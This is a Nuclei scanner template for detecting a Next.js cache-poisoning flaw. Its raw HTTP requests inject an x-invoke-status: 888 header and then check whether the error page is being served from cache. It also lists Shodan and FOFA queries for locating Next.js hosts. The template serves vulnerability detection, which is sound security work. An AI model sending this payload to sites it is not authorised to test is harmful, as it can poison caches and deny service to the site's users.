2024-06-27 10:20:38 +00:00
id: next-js-cache-poisoning

info:
  name: Next.js Cache Poisoning
  author: Ice3man543
  severity: high
  description: |
    Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.
  reference:
    - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13
    - https://github.com/valentin-panov/nextjs-no-cache-issue
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  metadata:
    vendor: vercel
    product: next.js
    framework: node.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: cve,cve2023,next-js,cache

variables:
  # Random cache-buster so both requests hit the same, otherwise unused, cache key.
  rand: "{{rand_text_numeric(5)}}"

http:
  # Request 1 sends x-invoke-status: 888; request 2 repeats the same URL without the header.
  - raw:
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        Priority: u=1
        x-invoke-status: 888
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}

    # Match only when the header-less second request also returns the 888 error page,
    # i.e. the response to request 1 was stored and served from cache.
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 888 && contains(body_1, '/_error')"
          - "status_code_2 == 888 && contains(body_2, '/_error')"
        condition: and
# digest: 490a004630440220431ffc17e1380ac71114b178c14ff533c132b114aaf6b6836f0f3da876cf438a022057a9d4cbba84903a9a9d2313346398135d45c8ec9cadbfc650737ffc5e174535:922c64590222798bb761d5b6d8e72950